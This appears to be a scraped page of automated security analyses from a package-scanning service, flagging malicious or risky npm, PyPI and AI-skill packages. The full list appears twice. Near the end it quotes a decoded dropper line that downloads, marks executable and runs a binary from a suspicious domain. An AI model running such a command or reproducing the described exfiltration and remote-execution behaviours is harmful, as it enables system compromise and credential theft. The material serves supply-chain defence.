Secure your dependencies. Ship with confidence.

No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.

This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.

This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).

The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf

This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.

Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.

This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.

Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.

The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.

Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.

This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.

The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.

Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.

This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.

This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.

This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.

This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.

Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.

This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.

Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.

This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.

This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.

This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).

The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf

This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.

Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.

This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.

Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.

The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.

Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.

This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.

The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.

Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.

This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.

This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.

This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.

This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.

Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.

This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.

Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.

This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.